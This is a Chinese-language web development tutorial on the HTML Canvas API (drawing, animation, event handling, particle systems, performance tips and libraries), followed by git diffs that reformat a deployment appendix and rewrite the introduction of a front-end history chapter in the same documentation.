> 🕹️ **交互演示**:拖动下方的点,感受 Canvas 的坐标系统。
<CoordinateSystemDemo />
### 1.3 绘制基本形状
Canvas 提供了几种绘制基本形状的方法:
#### 矩形
```javascript
// 填充矩形
ctx.fillStyle = '#3498db'
ctx.fillRect(x, y, width, height)
// 描边矩形
ctx.strokeStyle = '#2c3e50'
ctx.lineWidth = 2
ctx.strokeRect(x, y, width, height)
// 清除矩形区域
ctx.clearRect(x, y, width, height)
```
#### 圆形
```javascript
ctx.beginPath()
ctx.arc(x, y, radius, startAngle, endAngle)
ctx.fill() // 或 ctx.stroke()
```
**参数说明**
- `x, y`:圆心坐标
- `radius`:半径
- `startAngle, endAngle`:起始和结束角度(弧度制)
- `0` = 3 点钟方向
- `Math.PI / 2` = 6 点钟方向
- `Math.PI` = 9 点钟方向
- `Math.PI * 1.5` = 12 点钟方向
- `Math.PI * 2` = 回到 3 点钟方向
#### 线条
```javascript
ctx.beginPath()
ctx.moveTo(x1, y1) // 起点
ctx.lineTo(x2, y2) // 终点
ctx.stroke()
```
### 1.4 颜色和渐变
Canvas 支持多种颜色设置方式:
```javascript
// 纯色
ctx.fillStyle = '#3498db' // 十六进制
ctx.fillStyle = 'rgb(52, 152, 219)' // RGB
ctx.fillStyle = 'rgba(52, 152, 219, 0.5)' // RGBA(带透明度)
// 线性渐变
const gradient = ctx.createLinearGradient(x1, y1, x2, y2)
gradient.addColorStop(0, '#3498db')
gradient.addColorStop(1, '#e74c3c')
ctx.fillStyle = gradient
// 径向渐变
const radialGradient = ctx.createRadialGradient(x1, y1, r1, x2, y2, r2)
radialGradient.addColorStop(0, '#3498db')
radialGradient.addColorStop(1, 'transparent')
ctx.fillStyle = radialGradient
```
---
## 2. 路径与形状
### 2.1 路径 (Path) 的概念
**路径**是 Canvas 中的核心概念,它是由一系列点连接成的"轨迹"。你可以把它想象成用笔画线的过程:
1. `beginPath()` - 开始新路径(拿起笔)
2. `moveTo()` - 移动到起点(不画线)
3. `lineTo()` / `arc()` / `curveTo()` - 绘制线条或曲线
4. `closePath()` - 闭合路径(可选)
5. `fill()` / `stroke()` - 填充或描边
```javascript
ctx.beginPath()
ctx.moveTo(100, 100) // 移动到起点
ctx.lineTo(200, 100) // 画横线
ctx.lineTo(150, 150) // 画斜线
ctx.closePath() // 闭合路径(回到起点)
ctx.fill() // 填充
```
### 2.2 绘制复杂形状
通过组合路径,可以绘制任意复杂的形状:
#### 三角形
```javascript
ctx.beginPath()
ctx.moveTo(100, 50)
ctx.lineTo(150, 150)
ctx.lineTo(50, 150)
ctx.closePath()
ctx.fillStyle = '#e74c3c'
ctx.fill()
```
#### 星形
```javascript
function drawStar(ctx, cx, cy, spikes, outerRadius, innerRadius) {
let rot = (Math.PI / 2) * 3
let x = cx
let y = cy
const step = Math.PI / spikes
ctx.beginPath()
ctx.moveTo(cx, cy - outerRadius)
for (let i = 0; i < spikes; i++) {
x = cx + Math.cos(rot) * outerRadius
y = cy + Math.sin(rot) * outerRadius
ctx.lineTo(x, y)
rot += step
x = cx + Math.cos(rot) * innerRadius
y = cy + Math.sin(rot) * innerRadius
ctx.lineTo(x, y)
rot += step
}
ctx.lineTo(cx, cy - outerRadius)
ctx.closePath()
ctx.fill()
}
drawStar(ctx, 150, 150, 5, 50, 25)
```
---
## 3. 文本与图片
### 3.1 绘制文本
Canvas 也可以绘制文本:
```javascript
// 填充文本
ctx.font = '30px Arial'
ctx.fillStyle = '#2c3e50'
ctx.fillText('Hello Canvas', x, y)
// 描边文本
ctx.font = 'bold 40px Arial'
ctx.strokeStyle = '#e74c3c'
ctx.lineWidth = 2
ctx.strokeText('Hello Canvas', x, y)
// 文本对齐
ctx.textAlign = 'center' // left, center, right
ctx.textBaseline = 'middle' // top, middle, bottom
ctx.fillText('Centered', canvas.width / 2, canvas.height / 2)
```
### 3.2 加载和绘制图片
```javascript
const img = new Image()
img.src = 'image.png'
img.onload = () => {
// 绘制图片
ctx.drawImage(img, x, y)
// 缩放图片
ctx.drawImage(img, x, y, width, height)
// 裁剪图片
ctx.drawImage(img, sx, sy, sWidth, sHeight, dx, dy, dWidth, dHeight)
}
```
**参数说明**
- `sx, sy, sWidth, sHeight`:源图像的裁剪区域
- `dx, dy, dWidth, dHeight`:目标画布的绘制区域
### 3.3 裁剪与合成
```javascript
// 裁剪区域
ctx.save()
ctx.beginPath()
ctx.arc(x, y, radius, 0, Math.PI * 2)
ctx.clip() // 之后的所有绘制都只会显示在圆形内
ctx.drawImage(img, 0, 0)
ctx.restore()
// 全局合成操作
ctx.globalCompositeOperation = 'source-over' // 默认
ctx.globalCompositeOperation = 'destination-over' // 绘制在现有内容后面
ctx.globalCompositeOperation = 'source-in' // 只保留重叠部分
```
---
## 4. 动画基础
### 4.1 requestAnimationFrame
在 Canvas 中创建动画,核心是使用 `requestAnimationFrame` 方法。它是浏览器专门为动画优化的 API:
```javascript
function animate() {
// 1. 清除画布(或绘制半透明背景产生拖尾效果)
ctx.clearRect(0, 0, canvas.width, canvas.height)
// 2. 更新状态
update()
// 3. 绘制
draw()
// 4. 请求下一帧
requestAnimationFrame(animate)
}
// 启动动画
animate()
```
**为什么用 requestAnimationFrame 而不是 setInterval**
- 自动优化,通常为 60FPS(每秒 60 帧)
- 页面不可见时自动暂停,节省资源
- 与浏览器刷新周期同步,避免画面撕裂
> 🕹️ **交互演示**:点击播放,观察不同类型的动画效果。
<AnimationLoopDemo />
### 4.2 清除与重绘
动画的本质是**快速连续绘制静态画面**。每帧需要:
1. **清除旧画面**`ctx.clearRect()` 或用半透明背景覆盖
2. **更新状态**:计算新位置、新角度等
3. **绘制新画面**:重新绘制所有对象
```javascript
// 方法1:完全清除
ctx.clearRect(0, 0, canvas.width, canvas.height)
// 方法2:半透明背景(产生拖尾效果)
ctx.fillStyle = 'rgba(255, 255, 255, 0.1)'
ctx.fillRect(0, 0, canvas.width, canvas.height)
// 方法3:只清除变化区域(脏矩形优化)
objects.forEach(obj => {
if (obj.moved) {
ctx.clearRect(obj.oldX, obj.oldY, obj.size, obj.size)
obj.draw(ctx)
}
})
```
### 4.3 动画循环
一个完整的动画循环示例:
```javascript
let ball = {
x: 300,
y: 200,
vx: 2,
vy: 3,
radius: 20
}
function update() {
// 更新位置
ball.x += ball.vx
ball.y += ball.vy
// 边界碰撞
if (ball.x + ball.radius > canvas.width || ball.x - ball.radius < 0) {
ball.vx = -ball.vx
}
if (ball.y + ball.radius > canvas.height || ball.y - ball.radius < 0) {
ball.vy = -ball.vy
}
}
function draw() {
// 清除画布
ctx.clearRect(0, 0, canvas.width, canvas.height)
// 绘制球
ctx.beginPath()
ctx.arc(ball.x, ball.y, ball.radius, 0, Math.PI * 2)
ctx.fillStyle = '#3498db'
ctx.fill()
}
function animate() {
update()
draw()
requestAnimationFrame(animate)
}
animate()
```
---
## 5. 事件处理
Canvas 只是一个 DOM 元素,不像 SVG 那样每个图形都是独立的 DOM 元素。因此,我们需要**手动处理交互事件**。
### 5.1 鼠标事件
```javascript
canvas.addEventListener('click', (e) => {
const rect = canvas.getBoundingClientRect()
const x = e.clientX - rect.left
const y = e.clientY - rect.top
console.log(`Clicked at (${x}, ${y})`)
})
canvas.addEventListener('mousemove', (e) => {
const rect = canvas.getBoundingClientRect()
const x = e.clientX - rect.left
const y = e.clientY - rect.top
// 检测是否悬停在某个对象上
objects.forEach(obj => {
const dist = Math.sqrt((x - obj.x) ** 2 + (y - obj.y) ** 2)
if (dist < obj.radius) {
canvas.style.cursor = 'pointer'
obj.hovered = true
}
})
})
```
### 5.2 拖拽实现
```javascript
let isDragging = false
let selectedObject = null
canvas.addEventListener('mousedown', (e) => {
const { x, y } = getMousePos(e)
objects.forEach(obj => {
const dist = Math.sqrt((x - obj.x) ** 2 + (y - obj.y) ** 2)
if (dist < obj.radius) {
isDragging = true
selectedObject = obj
}
})
})
canvas.addEventListener('mousemove', (e) => {
if (isDragging && selectedObject) {
const { x, y } = getMousePos(e)
selectedObject.x = x
selectedObject.y = y
draw() // 重绘
}
})
canvas.addEventListener('mouseup', () => {
isDragging = false
selectedObject = null
})
```
### 5.3 键盘事件
```javascript
canvas.tabIndex = 0 // 使 canvas 可以获取焦点
canvas.focus()
canvas.addEventListener('keydown', (e) => {
const step = 10
switch(e.key) {
case 'ArrowUp':
selectedObject.y -= step
break
case 'ArrowDown':
selectedObject.y += step
break
case 'ArrowLeft':
selectedObject.x -= step
break
case 'ArrowRight':
selectedObject.x += step
break
case 'Delete':
objects = objects.filter(obj => obj !== selectedObject)
break
}
draw()
})
```
> 🕹️ **交互演示**:尝试在下方的 Canvas 中点击、拖拽、悬停,体验不同的事件处理方式。
<EventHandlingDemo />
---
## 6. 实战案例
### 6.1 绘制折线图
```javascript
const data = [10, 50, 30, 80, 60, 90, 40]
function drawLineChart(ctx, data) {
const padding = 50
const chartWidth = canvas.width - padding * 2
const chartHeight = canvas.height - padding * 2
const maxValue = Math.max(...data)
// 绘制坐标轴
ctx.beginPath()
ctx.moveTo(padding, padding)
ctx.lineTo(padding, canvas.height - padding)
ctx.lineTo(canvas.width - padding, canvas.height - padding)
ctx.strokeStyle = '#2c3e50'
ctx.stroke()
// 绘制折线
ctx.beginPath()
data.forEach((value, index) => {
const x = padding + (index / (data.length - 1)) * chartWidth
const y = canvas.height - padding - (value / maxValue) * chartHeight
if (index === 0) {
ctx.moveTo(x, y)
} else {
ctx.lineTo(x, y)
}
})
ctx.strokeStyle = '#3498db'
ctx.lineWidth = 2
ctx.stroke()
// 绘制数据点
data.forEach((value, index) => {
const x = padding + (index / (data.length - 1)) * chartWidth
const y = canvas.height - padding - (value / maxValue) * chartHeight
ctx.beginPath()
ctx.arc(x, y, 5, 0, Math.PI * 2)
ctx.fillStyle = '#e74c3c'
ctx.fill()
})
}
```
### 6.2 简单粒子系统
粒子系统是游戏和特效中常见的技术,它由大量小粒子组成,每个粒子有独立的位置、速度、生命周期等属性。
```javascript
class Particle {
constructor(x, y) {
this.x = x
this.y = y
this.vx = (Math.random() - 0.5) * 4
this.vy = (Math.random() - 0.5) * 4
this.life = 1.0
this.color = `hsl(${Math.random() * 360}, 70%, 50%)`
}
update() {
this.x += this.vx
this.y += this.vy
this.life -= 0.02
}
draw(ctx) {
ctx.globalAlpha = this.life
ctx.fillStyle = this.color
ctx.beginPath()
ctx.arc(this.x, this.y, 3, 0, Math.PI * 2)
ctx.fill()
ctx.globalAlpha = 1.0
}
isDead() {
return this.life <= 0
}
}
// 动画循环
let particles = []
function animate() {
ctx.clearRect(0, 0, canvas.width, canvas.height)
// 更新和绘制粒子
particles = particles.filter(p => !p.isDead())
particles.forEach(p => {
p.update()
p.draw(ctx)
})
requestAnimationFrame(animate)
}
// 鼠标移动产生粒子
canvas.addEventListener('mousemove', (e) => {
const { x, y } = getMousePos(e)
for (let i = 0; i < 3; i++) {
particles.push(new Particle(x, y))
}
})
animate()
```
> 🕹️ **交互演示**:在下方 Canvas 中移动鼠标,体验不同的粒子效果。
<ParticleSystemDemo />
---
## 7. 性能优化
随着绘制的对象增多,Canvas 性能会下降。以下是一些常用的优化技巧:
### 7.1 离屏 Canvas (Offscreen Canvas)
预渲染静态内容到离屏 Canvas,减少每帧的绘制操作:
```javascript
// 创建离屏 Canvas
const offscreenCanvas = document.createElement('canvas')
const offscreenCtx = offscreenCanvas.getContext('2d')
offscreenCanvas.width = 600
offscreenCanvas.height = 400
// 预渲染背景
function drawBackground(ctx) {
ctx.fillStyle = '#f0f0f0'
ctx.fillRect(0, 0, 600, 400)
// 绘制网格...
}
drawBackground(offscreenCtx)
// 主渲染循环
function draw() {
// 直接复制预渲染的背景
ctx.drawImage(offscreenCanvas, 0, 0)
// 只绘制动态对象
objects.forEach(obj => obj.draw(ctx))
}
```
### 7.2 图层管理
将静态背景和动态对象分层渲染:
```javascript
// 背景层(只绘制一次)
const backgroundLayer = document.createElement('canvas')
// ... 绘制静态背景
// 动态层(每帧重绘)
const dynamicLayer = canvas
function draw() {
// 清除动态层
ctx.clearRect(0, 0, canvas.width, canvas.height)
// 绘制背景层
ctx.drawImage(backgroundLayer, 0, 0)
// 绘制动态对象
objects.forEach(obj => obj.draw(ctx))
}
```
### 7.3 减少重绘
只重绘变化的部分(脏矩形优化):
```javascript
function draw() {
objects.forEach(obj => {
if (obj.moved) {
// 清除旧位置
ctx.clearRect(obj.oldX - obj.size, obj.oldY - obj.size, obj.size * 2, obj.size * 2)
// 绘制新位置
obj.draw(ctx)
obj.moved = false
}
})
}
```
### 7.4 批量渲染
减少状态切换(fillStyle、strokeStyle 等):
```javascript
// 按颜色分组
const batches = {}
objects.forEach(obj => {
if (!batches[obj.color]) {
batches[obj.color] = []
}
batches[obj.color].push(obj)
})
// 批量绘制相同颜色的对象
Object.keys(batches).forEach(color => {
ctx.fillStyle = color // 只设置一次颜色
batches[color].forEach(obj => {
ctx.beginPath()
ctx.arc(obj.x, obj.y, obj.size, 0, Math.PI * 2)
ctx.fill()
})
})
```
> 🕹️ **交互演示**:对比不同优化技术的性能差异。
<PerformanceDemo />
---
## 8. 常见库与框架
虽然原生 Canvas 已经很强大,但在实际项目中,使用成熟的库可以大大提高开发效率。
### 8.1 Fabric.js
**特点**:对象模型,支持交互
```javascript
const canvas = new fabric.Canvas('c')
// 创建圆形
const circle = new fabric.Circle({
radius: 20,
fill: '#3498db',
left: 100,
top: 100
})
canvas.add(circle)
// 自动处理事件
circle.on('click', () => {
circle.set('fill', '#e74c3c')
canvas.renderAll()
})
```
**适用场景**:图片编辑器、白板工具、图形设计工具
### 8.2 Konva.js
**特点**:高性能,支持动画和滤镜
```javascript
const stage = new Konva.Stage({
container: 'container',
width: 600,
height: 400
})
const layer = new Konva.Layer()
stage.add(layer)
const circle = new Konva.Circle({
x: 300,
y: 200,
radius: 50,
fill: '#3498db',
draggable: true
})
layer.add(circle)
```
**适用场景**:复杂的图形应用、动画演示
### 8.3 PixiJS (WebGL)
**特点**WebGL 加速,超高性能
```javascript
const app = new PIXI.Application({
width: 600,
height: 400,
backgroundColor: 0x1099bb
})
document.body.appendChild(app.view)
const graphics = new PIXI.Graphics()
graphics.beginFill(0x3498db)
graphics.drawCircle(300, 200, 50)
graphics.endFill()
app.stage.addChild(graphics)
```
**适用场景**:大型游戏、粒子系统、大量对象的场景
### 8.4 Three.js (3D)
虽然 Three.js 主要用于 3D,但也支持 2D 渲染:
```javascript
const scene = new THREE.Scene()
const camera = new THREE.OrthographicCamera(0, 600, 400, 0, 1, 1000)
const renderer = new THREE.WebGLRenderer()
renderer.setSize(600, 400)
document.body.appendChild(renderer.domElement)
const geometry = new THREE.CircleGeometry(50, 32)
const material = new THREE.MeshBasicMaterial({ color: 0x3498db })
const circle = new THREE.Mesh(geometry, material)
circle.position.set(300, 200, 0)
scene.add(circle)
function animate() {
requestAnimationFrame(animate)
renderer.render(scene, camera)
}
animate()
```
**适用场景**2.5D 游戏、混合 2D/3D 应用
### 8.5 选择建议
| 库 | 优势 | 劣势 | 适用场景 |
| :--- | :--- | :--- | :--- |
| **原生 Canvas** | 轻量、无依赖 | 开发效率低 | 学习、简单图形 |
| **Fabric.js** | 对象模型、交互友好 | 性能一般 | 图片编辑器、白板 |
| **Konva.js** | 高性能、API 简洁 | 体积较大 | 复杂图形应用 |
| **PixiJS** | 超高性能、WebGL | 学习曲线陡 | 大型游戏 |
| **Three.js** | 3D 能力强 | 过于重量级 | 2.5D 游戏 |
---
## 9. 总结与最佳实践
### 9.1 核心要点回顾
1. **Canvas 是位图画布**:绘制后就是像素,无法直接修改已有内容
2. **坐标系统**:原点在左上角,Y 轴向下为正
3. **路径系统**beginPath → moveTo → lineTo → fill/stroke
4. **动画原理**:清除 → 更新 → 绘制 → requestAnimationFrame
5. **事件处理**:需要手动计算碰撞检测
6. **性能优化**:离屏 Canvas、脏矩形、批量渲染
### 9.2 最佳实践
#### 代码组织
```javascript
// 使用类封装对象
class GameObject {
constructor(x, y) {
this.x = x
this.y = y
}
update() {
// 更新状态
}
draw(ctx) {
// 绘制
}
isHit(x, y) {
// 碰撞检测
const dist = Math.sqrt((x - this.x) ** 2 + (y - this.y) ** 2)
return dist < this.radius
}
}
```
#### 性能优化清单
- ✅ 使用 `requestAnimationFrame` 而不是 `setInterval`
- ✅ 减少状态切换(按颜色分组绘制)
- ✅ 使用离屏 Canvas 预渲染静态内容
- ✅ 只重绘变化的部分(脏矩形)
- ✅ 限制对象数量,使用对象池
- ✅ 避免 `save()``restore()` 的频繁调用
#### 调试技巧
```javascript
// 绘制边界框(用于调试)
function drawBoundingBox(ctx, obj) {
ctx.strokeStyle = '#e74c3c'
ctx.lineWidth = 1
ctx.strokeRect(
obj.x - obj.radius,
obj.y - obj.radius,
obj.radius * 2,
obj.radius * 2
)
}
// 显示 FPS
let lastTime = performance.now()
let frameCount = 0
function showFPS() {
const now = performance.now()
frameCount++
if (now >= lastTime + 1000) {
console.log(`FPS: ${frameCount}`)
frameCount = 0
lastTime = now
}
requestAnimationFrame(showFPS)
}
showFPS()
```
### 9.3 学习路线
1. **入门**:掌握基本形状绘制和颜色
2. **进阶**:学习动画原理和事件处理
3. **实战**:制作小游戏(贪吃蛇、打砖块)
4. **优化**:学习性能优化技巧
5. **扩展**:尝试成熟的 Canvas 库(Fabric.js、Konva
---
## 10. 名词速查表 (Glossary)
| 名词 | 解释 |
| :--- | :--- |
| **Context / 上下文** | Canvas 的渲染环境,通过 `getContext('2d')` 获取,所有绘制操作都通过它完成 |
| **Path / 路径** | 由一系列点连接成的轨迹,是 Canvas 绘图的基础 |
| **Stroke / 描边** | 绘制路径的轮廓线 |
| **Fill / 填充** | 用颜色填充路径内部 |
| **requestAnimationFrame** | 浏览器提供的动画 API,在每次重绘前调用回调函数 |
| **Offscreen Canvas** | 离屏 Canvas,用于预渲染静态内容以提高性能 |
| **Dirty Rect** | 脏矩形优化,只重绘变化的部分 |
| **Particle System** | 粒子系统,由大量小粒子组成的特效系统 |
| **Collision Detection** | 碰撞检测,判断鼠标或对象是否点击了某个图形 |
| **Raster vs Vector** | 位图 vs 矢量图,Canvas 是位图,SVG 是矢量图 |
---
**下一步建议**
- 如果你想深入学习 Canvas 动画,可以尝试制作一个**贪吃蛇游戏**或**打砖块游戏**
- 如果你对数据可视化感兴趣,可以学习 **ECharts****D3.js**
- 如果你想做游戏开发,可以尝试 **Phaser.js** 游戏引擎
- 如果你对 WebGL 感兴趣,可以学习 **Three.js****PixiJS**
祝你学习愉快!🎨
docs/zh-cn/appendix/deployment.md
+42 -37
View File
@@ -13,21 +13,21 @@
就像在现实生活中,不同的东西有不同的送法:
1. **发传单(静态网页)**
* *场景*:公司的介绍页、博客文章。
* *特点*:内容是**死**的,印好了就不变了。
* *做法*:直接把“传单”贴在离用户最近的宣传栏(CDN)上。谁来看都一样,速度最快,成本最低。
- _场景_:公司的介绍页、博客文章。
- _特点_:内容是**死**的,印好了就不变了。
- _做法_:直接把“传单”贴在离用户最近的宣传栏(CDN)上。谁来看都一样,速度最快,成本最低。
2. **送乐高积木(SPA 单页应用)**
* *场景*:类似飞书、Notion 这种复杂的网页软件。
* *特点*:交互特别多,像个**软件**。
* *做法*:先给你寄一个“空盒子”和一大堆“零件”(JS代码),你的浏览器收到后,自己在本地把页面“拼”出来。
* *好处*:一旦加载完,点哪里都很快,因为不需要再找服务器要页面了,只需要要数据。
- _场景_:类似飞书、Notion 这种复杂的网页软件。
- _特点_:交互特别多,像个**软件**。
- _做法_:先给你寄一个“空盒子”和一大堆“零件”(JS代码),你的浏览器收到后,自己在本地把页面“拼”出来。
- _好处_:一旦加载完,点哪里都很快,因为不需要再找服务器要页面了,只需要要数据。
3. **送热披萨(SSR 服务端渲染)**
* *场景*:股票大盘、新闻头条、个性化推荐。
* *特点*:数据**实时变动**,或者需要**千人千面**。
* *做法*:必须在用户下单的那一秒,由办事员(服务器)现场查数据、现场组装好页面,再热乎乎地交给你。
* *好处*:数据绝对新鲜,而且搜索引擎(爬虫)最喜欢这种完整的页面。
- _场景_:股票大盘、新闻头条、个性化推荐。
- _特点_:数据**实时变动**,或者需要**千人千面**。
- _做法_:必须在用户下单的那一秒,由办事员(服务器)现场查数据、现场组装好页面,再热乎乎地交给你。
- _好处_:数据绝对新鲜,而且搜索引擎(爬虫)最喜欢这种完整的页面。
下面这个互动图,带你体验这三种不同的“配送路线”:
@@ -37,32 +37,32 @@
让我们看看它们都是干什么的,以及**为什么**我们缺不了它们:
1. **用户 (User) —— 寄件人**
* *动作*:在浏览器输入网址,回车。
* *人话*:就像是你发出了一个“我想看网页”的请求包裹。
- _动作_:在浏览器输入网址,回车。
- _人话_:就像是你发出了一个“我想看网页”的请求包裹。
2. **DNS (域名解析) —— 查号台**
* *为什么需要?* 电脑只认识数字(IP地址),人脑只记得住单词(域名)。
* *人话*:它负责告诉你“baidu.com”这个名字对应的**门牌号 (IP地址)** 到底是哪一家。
- _为什么需要?_ 电脑只认识数字(IP地址),人脑只记得住单词(域名)。
- _人话_:它负责告诉你“baidu.com”这个名字对应的**门牌号 (IP地址)** 到底是哪一家。
3. **CDN (内容分发) —— 家门口的快递柜**
* *为什么需要?* 服务器可能在地球另一边,传一张图片过来太慢了。
* *人话*:如果你要的东西(图片、视频)在楼下的快递柜(CDN节点)里正好有备份,直接给你,**不用跑远路**去总仓库取。
- _为什么需要?_ 服务器可能在地球另一边,传一张图片过来太慢了。
- _人话_:如果你要的东西(图片、视频)在楼下的快递柜(CDN节点)里正好有备份,直接给你,**不用跑远路**去总仓库取。
4. **WAF (防火墙) —— 小区保安**
* *为什么需要?* 互联网上有很多坏人(黑客)想搞破坏。
* *人话*:它站在门口,把带炸弹的、发传单的(恶意攻击)都**拦在外面**,只让正常的客人进去。
- _为什么需要?_ 互联网上有很多坏人(黑客)想搞破坏。
- _人话_:它站在门口,把带炸弹的、发传单的(恶意攻击)都**拦在外面**,只让正常的客人进去。
5. **LB (负载均衡) —— 大堂经理**
* *为什么需要?* 访问的人太多了,一台服务器累死也干不完。
* *人话*:它看着后面开着的 10 个窗口(服务器),把你引导到那个**最空闲**的窗口去办理业务,不让你干等。
- _为什么需要?_ 访问的人太多了,一台服务器累死也干不完。
- _人话_:它看着后面开着的 10 个窗口(服务器),把你引导到那个**最空闲**的窗口去办理业务,不让你干等。
6. **Server (服务器) —— 办事员**
* *为什么需要?* 总得有人真正干活,处理你的订单、计算金额。
* *人话*:他是真正**处理业务**的人,负责把网页内容拼好,或者把数据算出来给你。
- _为什么需要?_ 总得有人真正干活,处理你的订单、计算金额。
- _人话_:他是真正**处理业务**的人,负责把网页内容拼好,或者把数据算出来给你。
7. **DB (数据库) —— 档案室**
* *为什么需要?* 办事员脑子记不住那么多数据,而且断电了不能忘。
* *人话*:这里**永久保存**着你的账号、密码、历史订单等核心机密数据。
- _为什么需要?_ 办事员脑子记不住那么多数据,而且断电了不能忘。
- _人话_:这里**永久保存**着你的账号、密码、历史订单等核心机密数据。
弄懂了这个流程,部署就不难了。部署无非就是把这些环节一个个打通。
@@ -99,6 +99,7 @@
### 2.1 怎么选配置?
新手最容易犯两个错:
1. **买太小**1核1G 的机器,跑个 Hello World 还行,稍微装点东西就卡死。
2. **买太大**:一上来就买 8核16G,结果每天只有 10 个人访问,纯属浪费钱。
@@ -157,6 +158,7 @@ sudo npm i -g pm2
**CDN (内容分发网络)** 就是解决这个问题的。
它在全球各地建了无数个“小仓库”。当你把图片、CSS、JS 文件放到 CDN 上:
- 北京用户访问,CDN 就近从北京节点给他。
- 纽约用户访问,CDN 就近从纽约节点给他。
@@ -169,6 +171,7 @@ sudo npm i -g pm2
## 5. CI/CD:告别“手工搬砖”
以前发布网站是这样的:
1. 在本地改代码。
2. 用 FTP 软件把文件上传到服务器。
3. SSH 连上去重启服务。
@@ -181,6 +184,7 @@ sudo npm i -g pm2
你只需要做一件事:**把代码推送到 Git 仓库**。
剩下的事情,流水线(Pipeline)自动帮你做:
1. **检测**:自动发现有新代码了。
2. **安装**:自动在新环境里装依赖 (`npm install`)。
3. **构建**:自动打包 (`npm run build`)。
@@ -207,6 +211,7 @@ sudo npm i -g pm2
### 6.1 监控 (Observability)
你需要给服务器装上“摄像头”和“报警器”:
- **日志 (Logs)**:记录程序运行的每一句话。报错了查日志,一查一个准。
- **指标 (Metrics)**CPU 用了多少?内存剩多少?QPS(每秒请求数)是多少?
- **告警 (Alerts)**:当 CPU 飙到 90%,或者错误率突然升高时,直接发短信/钉钉告诉你。
@@ -224,24 +229,24 @@ sudo npm i -g pm2
别慌,按这个表排查:
| 现象 | 可能原因 | 怎么办? |
| :--- | :--- | :--- |
| 现象 | 可能原因 | 怎么办? |
| :------------- | :--------------------------------------- | :------------------------------------------------------------------------- |
| **打不开网站** | 域名没解析好?服务器挂了?防火墙拦住了? | 1. `ping 域名` 看看通不通。<br>2. 检查云厂商防火墙是不是没开 80/443 端口。 |
| **HTTPS 报错** | 证书过期了?没配置好? | 运行 `certbot renew` 试着续期一下。 |
| **改了没生效** | 浏览器缓存?CDN 缓存? | 强制刷新浏览器 (Ctrl+F5);去 CDN 控制台点“刷新缓存”。 |
| **发布失败** | 依赖装不上?代码写错了? | 去看 CI/CD 的日志,最后几行通常就是原因。 |
| **HTTPS 报错** | 证书过期了?没配置好? | 运行 `certbot renew` 试着续期一下。 |
| **改了没生效** | 浏览器缓存?CDN 缓存? | 强制刷新浏览器 (Ctrl+F5);去 CDN 控制台点“刷新缓存”。 |
| **发布失败** | 依赖装不上?代码写错了? | 去看 CI/CD 的日志,最后几行通常就是原因。 |
---
## 8. 名词速查表 (Glossary)
| 缩写 | 全称 | 人话解释 |
| :--- | :--- | :--- |
| **DNS** | Domain Name System | **域名解析**。把网址变成 IP。 |
| **CDN** | Content Delivery Network | **加速网络**。把资源存到离用户最近的地方。 |
| **HTTPS** | HyperText Transfer Protocol Secure | **安全协议**。给数据传输加把锁。 |
| **CI/CD** | Continuous Integration / Deployment | **自动发布**。提交代码后自动跑完测试和上线流程。 |
| **PM2** | Process Manager 2 | **进程管家**。Node.js 的保姆,负责让程序一直跑着。 |
| 缩写 | 全称 | 人话解释 |
| :-------- | :---------------------------------- | :------------------------------------------------- |
| **DNS** | Domain Name System | **域名解析**。把网址变成 IP。 |
| **CDN** | Content Delivery Network | **加速网络**。把资源存到离用户最近的地方。 |
| **HTTPS** | HyperText Transfer Protocol Secure | **安全协议**。给数据传输加把锁。 |
| **CI/CD** | Continuous Integration / Deployment | **自动发布**。提交代码后自动跑完测试和上线流程。 |
| **PM2** | Process Manager 2 | **进程管家**。Node.js 的保姆,负责让程序一直跑着。 |
---
docs/zh-cn/appendix/frontend-evolution.md
+275 -25
View File
@@ -1,66 +1,316 @@
# 前端进化史:从 "切图" 到 "工程化" (Interactive Intro)
# 前端开发入门:从静态网页到现代工程化 (Interactive Intro)
> 💡 **学习指南**:本章节无需编程基础,通过交互式演示带你回顾前端开发的 20 年变迁。我们将从最基础的 HTML 讲起,一直到现代的 Vue/React 组件化开发。
先把几个最常见的新名词说清楚(后面会反复出现):
- **HTML**:网页的“骨架”,负责内容和结构(标题、段落、图片、按钮)。
- **CSS**:网页的“皮肤”,负责样式(颜色、大小、布局、动画)。
- **JavaScript**:网页的“肌肉”,负责交互与逻辑(点击、输入、请求数据)。
- **框架(Framework)**:一套成熟的开发方式和工具,让你更高效地做复杂页面(比如 Vue/React)。
<FrontendEvolutionDemo />
## 0. 引言:网页的"身份危机"
## 0. 引言:网页为什么越来越难做?
最早的网页,只是**电子海报**。
现在的网页,是**桌面级应用** (如 VS Code, Figma)。
为了支撑这种转变,前端技术经历了一场从 "手工作坊" 到 "工业化生产" 的革命。
核心变化只有一点:**如何更高效地管理日益复杂的页面状态?**
核心变化只有一点:**页面越来越复杂,我们需要更高效的“组织方式”和“开发方式”。**
### 0.1 前端 vs 大前端(你到底在学什么?)
很多人说“我学前端”,但不同公司口径不一样。
- **前端(Web Frontend)**:主要指“在浏览器里跑的那部分”。典型产物是网站和 H5 页面。
- **大前端(Big Frontend)**:泛指“所有用户界面相关的开发”。不只 Web,还包括小程序、App、桌面应用等。
这里的几个新词(后面也会用到):
- **端**:平台/运行环境的意思,比如 Web 端、移动端、桌面端。
- **H5**:手机网页(本质也是 Web),通常用来做活动页/落地页,传播快、迭代快。
- **WebView**:App 里用来显示网页的“内置浏览器控件”。很多 App 的部分页面其实就是 WebView。
- **跨端**:用一套代码同时做多个端(比如同时做 iOS + Android)。
- **原生**:直接用平台官方语言/能力开发(iOS 的 Swift、Android 的 Kotlin)。
<BigFrontendScopeDemo />
**关键点**:大前端不是一个“新岗位名字”,而是一种范围:把体验交付到更多平台。
---
## 1. 痛苦的根源:命令式操作 (Imperative)
## 1. 第一阶段:静态网页与切图 (2000s-)
在 jQuery 时代(2005+),我们操作网页就像是在**发号施令**
"嘿,浏览器!找到那个 ID 是 `msg` 的 div,把它隐藏起来!然后把那个按钮变红!"
早期网页开发像做报纸:设计师把 UI 设计切成很多小图,前端把这些图片拼成页面
这就叫**切图**。
种方式直观,但随着页面变复杂,命令会打结。
里的几个新词:
- **静态网页**:页面内容基本固定,打开就是一份 HTML 文件(不像现在很多页面是“数据驱动、可交互”的)。
- **UI**User Interface,用户界面。也就是你看到的按钮、颜色、布局。
### 1.1 为什么会慢?
网页上的每一张小图,浏览器都要发一次**网络请求**。
请求越多,加载越慢。
<SliceRequestDemo />
补充一个常见技巧:**雪碧图 (Sprite)**。
把很多小图合成一张大图,这样请求数会变少(但制作和维护更麻烦)。
**关键点**:早期网页慢,常见原因之一是“请求太多”。(图片、脚本、样式都会产生请求)
---
## 2. 第二阶段:移动端普及与响应式布局 (2010s)
手机和平板开始流行以后,网页必须适配不同屏幕。
